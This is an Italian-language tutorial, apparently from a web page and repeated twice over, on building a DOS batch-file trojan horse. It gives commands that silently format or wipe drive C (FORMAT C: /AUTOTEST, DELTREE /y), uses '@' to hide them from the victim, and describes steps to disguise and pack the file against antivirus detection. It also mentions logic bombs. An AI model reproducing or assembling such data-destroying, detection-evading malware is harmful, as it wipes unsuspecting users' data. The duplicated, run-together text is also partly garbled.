Un trojan horse non è un vero e proprio virus, ma bensì un programma che può cancellare tutto il contenuto dell’ Hard Disk, esistono anche diverse sottocategorie di Trojan, ad esemio esistono i BAT-TROJAN HORSE, cioè trojan in formato “.bat”..Vediamo subito come realizzarlo: Apriamo un qualsiasi editor di testo, salviamolo con “nomechevuoi.bat” e scriviamo al suo internoC:>EDIT TROJAN1.BAT@FORMAT C: /AUTOTEST” oppure ”C:>EDIT TROJAN2.BAT@DELTREE /y C:*.*.Il carattere “@” serve a nascondere l’echo su schermo del comando (altrimenti l’utente si accorgerebbe subito di cosa succede)..Nel primo caso viene utilizzata una piccola backdoor del comando FORMAT, precisamente il parametro/AUTOTEST. Di solito l’esecuzione di questo comando a rischio chiede sempre all’utente di ripensarci, prima di avviare la formattazione.C:>FORMAT C:.ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C: ANDRANNO PERSIContinuare con la formattazione (S/N)?.Tuttavia usando /AUTOTEST questa richiesta non viene effettuata e parte direttamente la formattazione del disco (non si sa perchè la Microsoft abbia lasciato questo strano parametro). Stessa cosa per il comando DELTREE, che combinato con l’opzione /y rimuove tutti i files e tutte le cartelle dal disco C..Varianti simili si possono ottenere con il normale comando DEL del DOS. Per rendere uno di questi trojan horse più infido e intercettabile dall’utente ignaro potete procedere come segue:.- create il file BAT col trojan senza usare il comando @- usate una utility tipo BAT2COM per convertire il file BAT in un eseguibileCOM- per rendere la dimensione del trojan più grande (quindi più credibile) usateCOPY /B trojan.com + command.com final.com- comprimete il file FINAL.COM usando PKLITE.COM oppure DIET, ICE.In questo modo sarà veramente difficile rilevare il trojan nel file, anche per un antivirus. Rientrano nella categoria anche le Logic Bomb (=bombe logiche) che sono dei particolari trojan attivati da un evento temporale o dal verificarsi di una certa condizione.
creare un trojan
Un trojan horse non è un vero e proprio virus, ma bensì un programma che può cancellare tutto il contenuto dell’ Hard Disk, esistono anche diverse sottocategorie di Trojan, ad esemio esistono i BAT-TROJAN HORSE, cioè trojan in formato “.bat”..Vediamo subito come realizzarlo: Apriamo un qualsiasi editor di testo, salviamolo con “nomechevuoi.bat” e scriviamo al suo internoC:>EDIT TROJAN1.BAT@FORMAT C: /AUTOTEST” oppure ”C:>EDIT TROJAN2.BAT@DELTREE /y C:*.*.Il carattere “@” serve a nascondere l’echo su schermo del comando (altrimenti l’utente si accorgerebbe subito di cosa succede)..Nel primo caso viene utilizzata una piccola backdoor del comando FORMAT, precisamente il parametro/AUTOTEST. Di solito l’esecuzione di questo comando a rischio chiede sempre all’utente di ripensarci, prima di avviare la formattazione.C:>FORMAT C:.ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C: ANDRANNO PERSIContinuare con la formattazione (S/N)?.Tuttavia usando /AUTOTEST questa richiesta non viene effettuata e parte direttamente la formattazione del disco (non si sa perchè la Microsoft abbia lasciato questo strano parametro). Stessa cosa per il comando DELTREE, che combinato con l’opzione /y rimuove tutti i files e tutte le cartelle dal disco C..Varianti simili si possono ottenere con il normale comando DEL del DOS. Per rendere uno di questi trojan horse più infido e intercettabile dall’utente ignaro potete procedere come segue:.- create il file BAT col trojan senza usare il comando @- usate una utility tipo BAT2COM per convertire il file BAT in un eseguibileCOM- per rendere la dimensione del trojan più grande (quindi più credibile) usateCOPY /B trojan.com + command.com final.com- comprimete il file FINAL.COM usando PKLITE.COM oppure DIET, ICE.In questo modo sarà veramente difficile rilevare il trojan nel file, anche per un antivirus. Rientrano nella categoria anche le Logic Bomb (=bombe logiche) che sono dei particolari trojan attivati da un evento temporale o dal verificarsi di una certa condizione.